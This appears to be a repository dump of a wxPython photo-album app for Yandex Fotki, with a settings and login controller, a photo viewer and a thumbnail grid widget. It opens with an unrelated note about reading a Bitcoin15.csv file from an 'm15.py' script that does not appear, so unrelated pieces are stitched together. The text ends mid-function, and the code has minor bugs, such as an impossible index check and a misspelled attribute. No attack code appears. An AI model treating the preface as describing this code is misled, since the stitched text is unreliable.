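Editorial note: m15.py writes a space-delimited CSV with `|` as the quote character; reading it back needs the same dialect parameters. A short sketch, assuming the file was produced by the script above:

```python
import csv
# Read Bitcoin15.csv back with the same dialect it was written with
with open('Bitcoin15.csv', newline='') as f:
    for row in csv.reader(f, delimiter=' ', quotechar='|'):
        print(row)
```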
anwinged/phoebe | https://github.com/anwinged/phoebe | c796908e911f442ffd115a3074efd84ccd12b916 | d8f706a91f827845bc919835c7ce616cb9524e96 | 893b0aec18f05d699bc9231b5dda6a59fbfa4e09 | refs/heads/master | 2016-08-07T14:36:09.769870 | 2015-06-13T18:09:24 | 2015-06-13T18:09:24 | 32,375,597 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5719599723815918,
"alphanum_fraction": 0.5755515694618225,
"avg_line_length": 33.27601623535156,
"blob_id": "f5f5821dcdd78fc081d0174a4755506f78800b74",
"content_id": "46e87c1521c8fa8b0fd0866433d19e4b8a3339a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8018,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 221,
"path": "/lib/controllers/overviewctr.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport wx\r\nfrom lib.models import album\r\nfrom lib.models import yafotki\r\nfrom lib.models import cachedb\r\nfrom lib.controllers import progressctr\r\nfrom lib.extra import utils\r\nfrom lib.forms import overviewfrm\r\nfrom lib.forms import authfrm\r\nfrom lib.forms import syncfrm\r\nfrom lib.forms import singleviewfrm\r\n\r\n\r\nPROGRAM_NAME = u'Phoebe'\r\nSETTINGS_FILE = u'settings.json'\r\n\r\nDEFAULT_USER_SETTINGS = {\r\n 'pagewidth': 804,\r\n 'imageborder': 2,\r\n 'group_temp': '<center>{{rows}}</center>\\n',\r\n 'row_temp': '<a href=\"{{1200:href}}\"><img src=\"{{*:href}}\" width=\"{{*:w}}\" height=\"{{*:h}}\"/></a>',\r\n 'href_temp': '{{1000:href}}.jpg\\n',\r\n 'albums': {},\r\n}\r\n\r\n\r\nclass OverviewController(object):\r\n def __init__(self, app):\r\n self.app = app # экземпляр приложения\r\n \"\"\"@type : wx.App\"\"\"\r\n self.form = None # форма представления данных\r\n \"\"\"@type : wx.OverviewForm\"\"\"\r\n self.app_settings = {} # настройки приложения\r\n \"\"\"@type : dict\"\"\"\r\n self.user_name = u'' # имя текущего пользователя\r\n \"\"\"@type : unicode\"\"\"\r\n self.user_settings = {} # настройки пользователя\r\n \"\"\"@type : dict\"\"\"\r\n self.service_album = None # сервисный альбом\r\n \"\"\"@type : album.ServiceAlbum\"\"\"\r\n\r\n self.init()\r\n\r\n def album_settings(self, alb):\r\n syncfrm.SyncSettingsDialog(alb, self.form).Run()\r\n self.save_album_settings(alb)\r\n self.form.UpdateAlbumView(alb)\r\n\r\n def copy_photos(self, imglist, cols=1):\r\n \"\"\"\r\n Place photos\r\n @type imglist: list of photo.MatchedPhoto\r\n \"\"\"\r\n stripeWidth = self.user_settings['pagewidth']\r\n stripeBorder = self.user_settings['imageborder']\r\n stripeHeight = stripeWidth - 2 * stripeBorder\r\n group_temp = self.user_settings['group_temp']\r\n row_temp = self.user_settings['row_temp']\r\n rows = len(imglist) / cols + bool(len(imglist) % cols)\r\n text = ''\r\n\r\n for i in xrange(rows):\r\n row = imglist[i * cols : (i + 1) * cols]\r\n dims = utils.calc_frames([img.ratio for img in row],\r\n stripeWidth, stripeBorder, stripeHeight)\r\n rows_text = ''.join([utils.render_template(row_temp, img.remote, w, h)\r\n for img, (w, h) in zip(row, dims) if img.is_remote()])\r\n text += group_temp.replace('{{rows}}', rows_text)\r\n\r\n if utils.text_to_clipboard(text):\r\n self.show_log(u'Скопировано: {}'.format(len(imglist)))\r\n else:\r\n self.show_log(u'Чо та ни фига не могу скопировать')\r\n\r\n def copy_photo_links(self, imglist):\r\n \"\"\"\r\n @type imglist: list of photo.MatchedPhoto\r\n \"\"\"\r\n link_temp = self.user_settings['href_temp']\r\n text = ''.join([utils.render_template(link_temp, img.remote, 1024, 1024)\r\n for img in imglist if img.is_remote()])\r\n if utils.text_to_clipboard(text):\r\n self.show_log(u'Скопировано: {}'.format(len(imglist)))\r\n else:\r\n self.show_log(u'Чо та ни фига не могу скопировать')\r\n\r\n def create_form(self):\r\n self.form = overviewfrm.OverviewForm(self, PROGRAM_NAME)\r\n self.app.SetTopWindow(self.form)\r\n self.form.Show()\r\n\r\n @utils.http_handler\r\n def delete_album(self, alb):\r\n progress = progressctr.Progress(parent=self.form)\r\n with progress:\r\n alb.delete(progress)\r\n self.load_album(alb, progress)\r\n self.form.UpdateAlbumView(alb)\r\n\r\n def exit(self):\r\n self.save_user_settings()\r\n self.save_app_settings()\r\n\r\n def get_user_db_path(self):\r\n return os.path.join('usr', self.user_name + '.db')\r\n\r\n def 
get_user_settings_path(self):\r\n return os.path.join('usr', self.user_name + '.json')\r\n\r\n def init(self):\r\n self.load_app_settings()\r\n self.create_form()\r\n lastuser = self.app_settings.get('lastuser')\r\n if lastuser:\r\n self.load_user(lastuser)\r\n else:\r\n self.show_name(u'Залогинься!')\r\n\r\n @utils.http_handler\r\n def load_album(self, alb, progress=None):\r\n progress = progressctr.Progress.cover(progress, parent=self.form)\r\n with progress:\r\n photos = alb.get_photos(progress)\r\n self.form.ShowPhotos(photos, progress)\r\n self.show_title(alb)\r\n self.show_info(u'Всего: {}'.format(len(photos)))\r\n self.form.SetCurrentAlbum(alb)\r\n\r\n def load_app_settings(self):\r\n self.app_settings = utils.load_file(SETTINGS_FILE, {})\r\n\r\n @utils.long_time\r\n @utils.http_handler\r\n def load_user(self, username, password=None):\r\n self.form.ClearAll()\r\n self.user_name = username\r\n self.user_settings = utils.load_file(self.get_user_settings_path(), DEFAULT_USER_SETTINGS)\r\n self.user_settings['name'] = self.user_name\r\n self.app_settings['lastuser'] = self.user_name\r\n cachedb.connect(self.get_user_db_path())\r\n auth_token = self.user_settings.get('token')\r\n if auth_token or password:\r\n if password:\r\n yandex_service = yafotki.YandexService(self.user_name, password)\r\n else:\r\n yandex_service = yafotki.YandexService(self.user_name, password, auth_token)\r\n yandex_service.load()\r\n self.show_name(self.user_name)\r\n self.load_albums(yandex_service)\r\n else:\r\n self.show_name(u'Залогинься!')\r\n\r\n @utils.http_handler\r\n def load_albums(self, yaservice):\r\n yaservice.load()\r\n album_settings = self.user_settings['albums']\r\n self.user_settings['token'] = yaservice.token\r\n self.service_album = album.ServiceAlbum(yaservice, album_settings)\r\n self.form.ShowAlbumTree(self.service_album)\r\n\r\n def login(self):\r\n dlg = authfrm.AuthDialog(self.form, self.user_name or '', '')\r\n if dlg.ShowModal() == wx.ID_OK:\r\n self.load_user(dlg.username, dlg.password)\r\n\r\n def open_photo(self, photos, index=0):\r\n if not photos or index is None:\r\n return\r\n frm = singleviewfrm.SingleviewForm(self.form, photos, index)\r\n frm.ShowModal()\r\n\r\n @utils.long_time\r\n def refresh_albums(self):\r\n self.form.ClearAll()\r\n yaservice = self.service_album.service\r\n self.load_albums(yaservice)\r\n self.form.ReselectAlbum()\r\n\r\n def save_album_settings(self, alb):\r\n self.user_settings['albums'].update({\r\n alb.id: alb.get_settings()\r\n })\r\n self.save_user_settings()\r\n\r\n def save_app_settings(self):\r\n utils.save_file(SETTINGS_FILE, self.app_settings)\r\n\r\n def save_user_settings(self):\r\n if self.user_name:\r\n utils.save_file(self.get_user_settings_path(), self.user_settings)\r\n cachedb.close()\r\n\r\n def show_info(self, text):\r\n self.form.SetStatusText(text, 1)\r\n\r\n def show_log(self, text):\r\n self.form.SetStatusText(text, 2)\r\n\r\n def show_name(self, text):\r\n self.form.SetStatusText(text, 0)\r\n\r\n def show_title(self, alb=None):\r\n title = PROGRAM_NAME\r\n if alb:\r\n title += u': ' + alb.title\r\n if isinstance(alb, album.PhotoAlbum) and alb.folder:\r\n title += u' - ' + alb.folder\r\n self.form.SetTitle(title)\r\n\r\n @utils.http_handler\r\n def upload_album(self, alb):\r\n progress = progressctr.Progress(parent=self.form)\r\n with progress:\r\n alb.synchronize(progress)\r\n self.load_album(alb, progress)\r\n self.form.UpdateAlbumView(alb)\r\n"
},
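Editorial note: `copy_photos()` in the record above relies on `utils.calc_frames` to fit a row of mixed-aspect-ratio images into a fixed stripe width. That helper is not shown in this excerpt, so the usual justified-row math is sketched below as an assumed reconstruction, taking `ratio` to be width/height and the border to apply per image:

```python
# Assumed reconstruction of a justified-row layout (utils.calc_frames itself
# is not in the excerpt): all images in a row share one height h, chosen so
# their widths plus per-image borders fill the stripe, capped at max_height.
def calc_frames(ratios, stripe_width, border, max_height):
    usable = stripe_width - 2 * border * len(ratios)
    h = min(max_height, usable / float(sum(ratios)))  # common row height
    return [(int(r * h), int(h)) for r in ratios]
```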
{
"alpha_fraction": 0.5611474514007568,
"alphanum_fraction": 0.5732259750366211,
"avg_line_length": 32.25862121582031,
"blob_id": "803dd5f0e4fb6fe3c3623ccf81a42eb734cde8af",
"content_id": "32e06f3aec51a44db241b2690e47aa8efc894085",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 58,
"path": "/lib/forms/singleviewfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\nfrom lib.extra import utils\r\n\r\nclass SingleviewForm(wx.Dialog):\r\n def __init__(self, parent, photos, index):\r\n wx.Dialog.__init__(self, parent, title=u'Просмотр фотографии')\r\n\r\n self.photos = photos\r\n self.index = index\r\n\r\n self.image = wx.StaticBitmap(self)\r\n\r\n self.box = wx.BoxSizer(wx.VERTICAL)\r\n # adding stretchable space before and after centers the image.\r\n self.box.AddStretchSpacer(1)\r\n self.box.Add(self.image, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 0)\r\n self.box.AddStretchSpacer(1)\r\n\r\n self.image.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)\r\n\r\n self.SetWindowStyle(0)\r\n self.SetBackgroundColour(wx.Colour(25, 25, 25))\r\n self.Maximize()\r\n self.SetSizerAndFit(self.box)\r\n self.Center(wx.CENTER_ON_SCREEN)\r\n self.ShowPhoto()\r\n\r\n def OnKeyDown(self, event):\r\n if event.GetKeyCode() == wx.WXK_ESCAPE:\r\n self.EndModal(wx.ID_OK)\r\n if event.GetKeyCode() == wx.WXK_RIGHT:\r\n self.index = (self.index + 1) % len(self.photos)\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_LEFT:\r\n self.index = (self.index - 1) % len(self.photos)\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_HOME:\r\n self.index = 0\r\n self.ShowPhoto()\r\n if event.GetKeyCode() == wx.WXK_END:\r\n self.index = len(self.photos) - 1\r\n self.ShowPhoto()\r\n\r\n @utils.long_time\r\n def ShowPhoto(self):\r\n photo = self.photos[self.index]\r\n w, h = wx.GetDisplaySize()\r\n img = photo.wximage(max(w, 1200), max(h, 1200))\r\n img = utils.resize(img, w, h, wx.IMAGE_QUALITY_BICUBIC)\r\n self.image.SetBitmap(wx.BitmapFromImage(img))\r\n self.SetTitle(u'{} {}x{}'.format(photo.title, img.GetWidth(), img.GetHeight()))\r\n self.image.Center()\r\n self.Refresh()\r\n"
},
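Editorial note: `utils.resize` is used above to fit a photo into the display area. The standard fit-inside scaling keeps the aspect ratio by taking the smaller of the two scale factors; a sketch, since utils.resize itself is not in this excerpt:

```python
# Fit (w, h) inside (max_w, max_h) preserving aspect ratio; never upscale.
def fit_inside(w: int, h: int, max_w: int, max_h: int):
    scale = min(max_w / float(w), max_h / float(h), 1.0)
    return int(w * scale), int(h * scale)
```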
{
"alpha_fraction": 0.5387566089630127,
"alphanum_fraction": 0.5421724915504456,
"avg_line_length": 30.92560577392578,
"blob_id": "96bef79ba8b36cee435250627ca1c30f26e06962",
"content_id": "76f7d2fd62fe0038839b7e7d7ff1ef8b419bc0ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22357,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 578,
"path": "/lib/widgets/imglistctrl.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\nfrom lib.extra import utils\r\n\r\n\r\nclass BaseImage:\r\n \"\"\"\r\n Дескриптор изображения. Содержит всю информацию об изображении,\r\n осуществляет кеширование и загрузку картинки.\r\n \"\"\"\r\n def __init__(self, owner, data=None):\r\n \"\"\"\r\n @type owner: ImageListCtrl\r\n @param owner: компонент-владелец картинки\r\n \"\"\"\r\n self.owner = owner\r\n self.__data = data\r\n self.__cache_size = (-1, -1)\r\n self.__cache_img = None\r\n\r\n def GetData(self):\r\n \"\"\"\r\n @return: Получить пользовательские данные компонента\r\n \"\"\"\r\n return self.__data\r\n\r\n def SetData(self, new_data):\r\n \"\"\"\r\n Установить пользовательские данные компонента\r\n \"\"\"\r\n self.__data = new_data\r\n\r\n @property\r\n def data(self):\r\n return self.__data\r\n\r\n def LoadImage(self, w, h):\r\n \"\"\"\r\n Загрузить изображение.\r\n Дополнительные параметры ширины и высоты можно использовать при загрузке\r\n изображения, однако следует учесть, что изменение размера происходит в методе Load.\r\n Этот метод нужно переопределять в классах-наследниках.\r\n @param w: ширина миниатюры\r\n @param h: высота миниатюры\r\n @rtype: wx.Image\r\n @return: загруженное изображение\r\n \"\"\"\r\n return wx.EmptyImage(w, h, True)\r\n\r\n def Load(self):\r\n \"\"\"\r\n Загрузить изображение и изменить его размер до размера миниатюры.\r\n Для отображения миниатюры, нужно сперва явно вызвать этот метод,\r\n чтобы картинка загрузилась и сохранилась в кеше.\r\n \"\"\"\r\n x, y, w, h = self.GetImageRect(self.owner.GetImageWidth(), self.owner.GetImageHeight())\r\n img = self.LoadImage(w, h)\r\n ww = img.GetWidth()\r\n hh = img.GetHeight()\r\n # проверить, если нужно изменить размер\r\n if ww != w or hh != h:\r\n img = utils.resize(img, w, h)\r\n self.__cache_size = (w, h)\r\n self.__cache_img = img\r\n\r\n def GetWxImage(self, w, h):\r\n \"\"\"\r\n Поучить миниатюру\r\n Используется внутри ImageListCtrl для получения именно того изображения, которое будет отрисовано\r\n @param w: ширина миниатюры\r\n @param h: высота миниатюры\r\n @rtype: wx.Image\r\n @return: возвращает wx.Image такого размера, что он вписывается в заданный прямоугольник W x H\r\n \"\"\"\r\n if self.__cache_size != (w, h):\r\n return wx.EmptyImage(w, h, True)\r\n return self.__cache_img\r\n\r\n def GetFrameRect(self, width, height):\r\n d = 8\r\n return d, d, width - d * 2, height - d * 2\r\n\r\n def GetImageRect(self, width, height):\r\n d = 16\r\n return d, d, width - d * 2, height - d * 2\r\n\r\n def Draw(self, canvas, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать миниатюру (границу и изображение)\r\n @param index: номер миниатюры\r\n @param canvas: объект, на котором будет рисование\r\n @param width: ширина области рисования (с границами)\r\n @param height: высота области рисования (с границами)\r\n \"\"\"\r\n dc = wx.MemoryDC()\r\n dc.SelectObject(canvas)\r\n dc.BeginDrawing()\r\n self.DrawBackground(dc, width, height, index, selected)\r\n self.DrawInframeBackground(dc, width, height, index, selected)\r\n self.DrawFrame(dc, width, height, index, selected)\r\n self.DrawImage(dc, width, height, index, selected)\r\n self.DrawBadges(dc, width, height, index, selected)\r\n # dc.SetPen(wx.Pen(wx.RED, 1, wx.SOLID))\r\n # dc.DrawRectangle(0, 0, w, h)\r\n dc.EndDrawing()\r\n\r\n def DrawBackground(self, dc, width, height, index, selected):\r\n dc.SetPen(wx.Pen(wx.BLACK, 0, wx.TRANSPARENT))\r\n 
dc.SetBrush(wx.Brush(self.owner.GetBackgroundColour(), wx.SOLID))\r\n dc.DrawRectangle(0, 0, width, height)\r\n\r\n def DrawInframeBackground(self, dc, width, height, index, selected):\r\n pass\r\n # dc.SetBrush(wx.RED_BRUSH)\r\n # dc.DrawRectangleRect(wx.Rect(*self.GetFrameRect(width, height)))\r\n\r\n def DrawFrame(self, dc, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать рамку вокруг миниатюры\r\n \"\"\"\r\n if selected:\r\n color = self.owner.GetSelectionColour()\r\n thickness = 2\r\n else:\r\n color = self.owner.GetFrameColour()\r\n thickness = 1\r\n dc.SetPen(wx.Pen(color, thickness, wx.SOLID))\r\n dc.SetBrush(wx.Brush(wx.BLACK, wx.TRANSPARENT))\r\n dc.DrawRectangleRect(wx.Rect(*self.GetFrameRect(width, height)))\r\n\r\n def DrawImage(self, dc, width, height, index, selected):\r\n \"\"\"\r\n Нарисовать изображение миниатюры\r\n @param index: номер миниатюры\r\n @param img: миниатюра\r\n @param dc: объект, на котором будет рисование\r\n @param w: ширина области рисования (с границами)\r\n @param h: высота области рисования (с границами)\r\n \"\"\"\r\n ix, iy, iw, ih = self.GetImageRect(width, height)\r\n img = self.GetWxImage(iw, ih)\r\n bmp = wx.BitmapFromImage(img)\r\n dc.DrawBitmap(bmp, width / 2 - img.GetWidth() / 2, height / 2 - img.GetHeight() / 2)\r\n\r\n def DrawBadges(self, dc, width, height, index, selected):\r\n pass\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nclass LocalImage(BaseImage):\r\n \"\"\"\r\n Локальное изображение\r\n - изображение, которое находится на локальном компьютере или к которому\r\n есть доступ по стандартному пути\r\n \"\"\"\r\n def __init__(self, owner, img_path):\r\n BaseImage.__init__(self, owner, img_path)\r\n\r\n def LoadImage(self, w, h):\r\n return wx.Image(self.GetData())\r\n\r\n#------------------------------------------------------------------------------#\r\n\r\n\r\nmyEVT_ILC_IMAGE_SELECTED = wx.NewEventType()\r\nEVT_ILC_IMAGE_SELECTED = wx.PyEventBinder(myEVT_ILC_IMAGE_SELECTED, 1)\r\n\r\n\r\nclass ImageListCtrlEvent(wx.PyCommandEvent):\r\n def __init__(self, evtType, evtId):\r\n wx.PyCommandEvent.__init__(self, evtType, evtId)\r\n self.image = None\r\n\r\n def SetImage(self, image):\r\n self.image = image\r\n\r\n def GetImage(self):\r\n return self.image\r\n\r\n\r\nclass ImageListCtrl(wx.ScrolledWindow):\r\n \"\"\"Компонент предназначен для отображения списка миниатюр и дальнейшей работы с ними.\r\n Миниатюры имеют ленивую загрузку (по требованию), работает drag-n-dpor для\r\n перетаскивания миниатюр за пределы компонента.\r\n\r\n Миниатюра может быть представлена любым источником. 
Чтобы создать свой класс миниатюр,\r\n надо наследовать новый класс от BaseImage и переопределить в нем метод LoadImage,\r\n который отвечает за загрузку изображения из внешнего источника.\r\n \"\"\"\r\n\r\n class ImageOptions:\r\n def __init__(self):\r\n self.w = 0\r\n self.h = 0\r\n self.frame_color = wx.LIGHT_GREY\r\n self.selected_color = wx.BLUE\r\n\r\n def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition, size=wx.DefaultSize,\r\n twidth=120, theight=120):\r\n\r\n wx.ScrolledWindow.__init__(self, parent, id, pos, size)\r\n\r\n # Параметры изображений\r\n self.__img_opt = ImageListCtrl.ImageOptions()\r\n self.__cols = 0\r\n self.__rows = 0\r\n\r\n self.__items = []\r\n \"\"\"@type : list of BaseImage\"\"\"\r\n self.__selected = []\r\n \"\"\"@type : list of int\"\"\"\r\n\r\n self.SetThumbnailSize(twidth, theight)\r\n\r\n # Events\r\n self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)\r\n self.Bind(wx.EVT_PAINT, self.OnPaint)\r\n self.Bind(wx.EVT_SIZE, self.OnResize)\r\n # Mouse events\r\n self.Bind(wx.EVT_LEFT_DOWN, self.OnMouseDown)\r\n self.Bind(wx.EVT_MOTION, self.OnMouseMove)\r\n\r\n # self.Bind(wx.EVT_CHAR, lambda evt: evt.Skip())\r\n\r\n # ------------------------------------------------------------------------\r\n # Image manipulations\r\n\r\n @property\r\n def count(self):\r\n return len(self.__items)\r\n\r\n def Count(self):\r\n return self.count\r\n\r\n def Clear(self):\r\n \"\"\"\r\n Очистить компонент. Удаляет миниатюры и снимает выделение\r\n \"\"\"\r\n self.__items = []\r\n self.__selected = []\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def GetItems(self):\r\n \"\"\"\r\n @return: Список элементов компонента\r\n \"\"\"\r\n return self.__items\r\n\r\n def GetItemsData(self):\r\n \"\"\"\r\n @return: Список с данными каждого элемента компонента\r\n \"\"\"\r\n return [i.GetData() for i in self.__items]\r\n\r\n def IsSelected(self, index):\r\n \"\"\"\r\n @param index: номер элемента\r\n @return: Выделен ли элемент в данный момент\r\n \"\"\"\r\n return index in self.__selected\r\n\r\n def GetSelected(self):\r\n \"\"\"\r\n Список выделенных элементов\r\n \"\"\"\r\n return [self.__items[i] for i in self.__selected]\r\n\r\n def GetSelectedData(self):\r\n \"\"\"\r\n @return: Список с данными каждого выделенного элемента\r\n \"\"\"\r\n return [self.__items[i].GetData() for i in self.__selected]\r\n\r\n def GetSelectionIndex(self):\r\n \"\"\"\r\n @return: Номер первого выделенного элемента, None если ничего не выделено\r\n \"\"\"\r\n return self.__selected[0] if self.__selected else None\r\n\r\n def SetSelectionIndex(self, index):\r\n \"\"\"\r\n Установить элемент под индексом index выделенным\r\n \"\"\"\r\n if 0 > index >= self.count:\r\n raise IndexError()\r\n self.__selected = [index]\r\n\r\n def SetSelectedIndex(self, listOfIndexes):\r\n \"\"\"\r\n Установить выбранные елементы в соответствии со списком индексов\r\n \"\"\"\r\n for index in listOfIndexes:\r\n if not (0 <= index < self.count):\r\n raise IndexError('SetSelectionArray index out of range')\r\n self.__selected = listOfIndexes\r\n\r\n def Append(self, image):\r\n \"\"\"\r\n Добавить изображение в конец списка\r\n @type image: BaseImage\r\n \"\"\"\r\n image.owner = self\r\n self.__items.append(image)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def AppendImages(self, images):\r\n \"\"\"\r\n Добавить список изображений в конец списка\r\n \"\"\"\r\n assert isinstance(images, list)\r\n for img in images:\r\n img.ownew = self\r\n self.__items.extend(images)\r\n 
self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def AssignImages(self, images):\r\n \"\"\"\r\n Заменить имеющийся набор миниатюр указанным списком\r\n @type images: iterable\r\n \"\"\"\r\n self.Clear()\r\n self.AppendImages(images)\r\n\r\n def Insert(self, pos, image):\r\n \"\"\"\r\n Вставить изображение в список миниатюр.\r\n Если указанная позиция меньше нуля, то изображение\r\n будет добавлено в конец списка.\r\n \"\"\"\r\n image.SetOwner(self)\r\n if 0 <= pos < self.count:\r\n self.__items.insert(pos, image)\r\n else:\r\n self.__items.append(image)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def Remove(self, pos):\r\n \"\"\"\r\n Удалить изображение из списка\r\n \"\"\"\r\n self.__items[pos].owner = None\r\n self.__items.pop(pos)\r\n self.UpdateColsAndRows()\r\n self.Refresh(False)\r\n\r\n def LoadAll(self):\r\n \"\"\"\r\n Выполнить функцию Load() для всех элементов компонента\r\n \"\"\"\r\n for img in self.__items:\r\n img.Load()\r\n self.Refresh()\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Manipulations with thumbnails size\r\n\r\n # todo сделать более точное определение координат (включая границы)\r\n def GetItemIndex(self, x, y):\r\n \"\"\"\r\n Получить индекс миниатюры по указанным координатам внутри компонента\r\n \"\"\"\r\n x /= self.__img_opt.w\r\n y /= self.__img_opt.h\r\n index = y * self.__cols + x\r\n if x < 0 or x >= self.__cols:\r\n return -1\r\n if y < 0 or y >= self.__rows:\r\n return -1\r\n if index < 0 or index >= self.count:\r\n return -1\r\n return index\r\n\r\n def SetThumbnailSize(self, width=0, height=0):\r\n \"\"\"\r\n Установить размер миниатюр и пересчитать количество строк и колонок\r\n \"\"\"\r\n if width > 0:\r\n self.__img_opt.w = width\r\n if height > 0:\r\n self.__img_opt.h = height\r\n self.SetScrollRate(width / 5, height / 5)\r\n self.UpdateColsAndRows()\r\n\r\n def GetImageWidth(self):\r\n \"\"\"\r\n Получить ширину миниатюры\r\n \"\"\"\r\n return self.__img_opt.w\r\n\r\n def GetImageHeight(self):\r\n \"\"\"\r\n Получить высоту миниатюры\r\n \"\"\"\r\n return self.__img_opt.h\r\n\r\n def UpdateColsAndRows(self):\r\n \"\"\"\r\n Пересчитать количество строк и столбцов\r\n \"\"\"\r\n # получить ширину клиентской области компонента\r\n cl_width = self.GetClientSize().GetWidth()\r\n # вычислить количество колонок\r\n self.__cols = cl_width // self.__img_opt.w or 1\r\n # вычислить количество столбцов\r\n rest = len(self.__items) % self.__cols # остаток: 1 строка\r\n self.__rows = len(self.__items) // self.__cols + bool(rest)\r\n self.SetVirtualSize((self.__cols * self.__img_opt.w, self.__rows * self.__img_opt.h))\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Операции с цветовой палитрой\r\n\r\n def GetSelectionColour(self):\r\n return self.__img_opt.selected_color\r\n\r\n def SetSelectionColour(self, color):\r\n self.__img_opt.selected_color = color\r\n\r\n def GetFrameColour(self):\r\n return self.__img_opt.frame_color\r\n\r\n def SetFrameColour(self, color):\r\n self.__img_opt.frame_color = color\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Отрисовка компонента\r\n\r\n def GetPaintRect(self):\r\n \"\"\"Получить видимый прямоугольник окна, который нужно отрисовать\"\"\"\r\n size = self.GetClientSize()\r\n paintRect = wx.Rect(0, 0, size.GetWidth(), size.GetHeight())\r\n # возвращает первую видимую точку в scroll units\r\n paintRect.x, paintRect.y = self.GetViewStart()\r\n xu, yu = 
self.GetScrollPixelsPerUnit()\r\n paintRect.x *= xu\r\n paintRect.y *= yu\r\n return paintRect\r\n\r\n def OnPaint(self, event):\r\n \"\"\"Метод обрабатывает событие отрисовки компонента\"\"\"\r\n # получить видимую область компонента,\r\n # на которой будет происходить рисование\r\n dc = wx.BufferedPaintDC(self)\r\n self.PrepareDC(dc)\r\n dc.BeginDrawing()\r\n\r\n dc.SetPen(wx.Pen(wx.BLACK, 0, wx.TRANSPARENT))\r\n dc.SetBrush(wx.Brush(self.GetBackgroundColour(), wx.SOLID))\r\n\r\n paintRect = self.GetPaintRect()\r\n dc.DrawRectangleRect(paintRect)\r\n\r\n for idx, img in enumerate(self.__items):\r\n # определяем координаты колонки и строки\r\n row = idx // self.__cols\r\n col = idx % self.__cols\r\n # определяем координаты миниатюры в пикселях (включая границы)\r\n tw = self.__img_opt.w # ширина\r\n th = self.__img_opt.h # высота\r\n tx = col * tw # координата X\r\n ty = row * th # координата Y\r\n # продолжить, если н пересекается с видимой областью\r\n # (а значит и рисовать ничего не надо)\r\n if not paintRect.Intersects(wx.Rect(tx, ty, tw, th)):\r\n continue\r\n # создадим пустое изображение-буфер, на котором будем рисовать\r\n # все компоненты миниатюры\r\n canvas = wx.EmptyBitmap(tw, th)\r\n img.Draw(canvas, tw, th, idx, self.IsSelected(idx))\r\n # self.Draw(idx, img, canvas, tw, th)\r\n dc.DrawBitmap(canvas, tx, ty)\r\n\r\n dc.EndDrawing()\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Resizing\r\n\r\n def OnResize(self, event):\r\n # персчитать количество столбцов и строк\r\n self.UpdateColsAndRows()\r\n # обновить содержимое компонента\r\n self.Refresh(False)\r\n\r\n # ------------------------------------------------------------------------\r\n\r\n # Mouse events\r\n\r\n def OnMouseDown(self, event):\r\n def shift_select():\r\n first = self.__selected[0]\r\n if select < first:\r\n self.__selected = range(first, select - 1, -1)\r\n else:\r\n self.__selected = range(first, select + 1)\r\n\r\n x, y = self.CalcUnscrolledPosition(event.GetX(), event.GetY())\r\n select = self.GetItemIndex(x, y)\r\n\r\n sh = event.ShiftDown() # нажат шифт\r\n ct = event.ControlDown() # нажат контрол\r\n wt = select in self.__selected # выбранный элемент уже выделен\r\n gen_event = False\r\n\r\n # ничего не выбрано\r\n if select < 0:\r\n if not (sh or ct):\r\n self.__selected = []\r\n # новый элемент\r\n elif not wt:\r\n if not self.__selected:\r\n self.__selected = [select]\r\n elif ct:\r\n self.__selected.append(select)\r\n elif sh:\r\n shift_select()\r\n else:\r\n self.__selected = [select]\r\n gen_event = True\r\n # элемент уже был в списке\r\n else:\r\n if ct:\r\n self.__selected.remove(select)\r\n elif sh:\r\n shift_select()\r\n else:\r\n self.__selected = [select]\r\n\r\n # запускаем событие\r\n if gen_event:\r\n evt = ImageListCtrlEvent(myEVT_ILC_IMAGE_SELECTED, self.GetId())\r\n evt.SetInt(select)\r\n evt.SetImage(self.__items[select])\r\n self.GetEventHandler().ProcessEvent(evt)\r\n\r\n # обновляем компонент без перерисовки фона\r\n self.Refresh(False)\r\n self.SetFocus()\r\n\r\n def OnMouseMove(self, event):\r\n # if event.Dragging() and len(self._selectedarray):\r\n # text = ''\r\n # for i in self._selectedarray:\r\n # text = text + self._items[i].GetDnDText()\r\n #\r\n # text = wx.TextDataObject(text)\r\n # source = wx.DropSource(self)\r\n # source.SetData(text)\r\n # res = source.DoDragDrop()\r\n pass\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\ndef main():\r\n app = wx.App(redirect=False)\r\n 
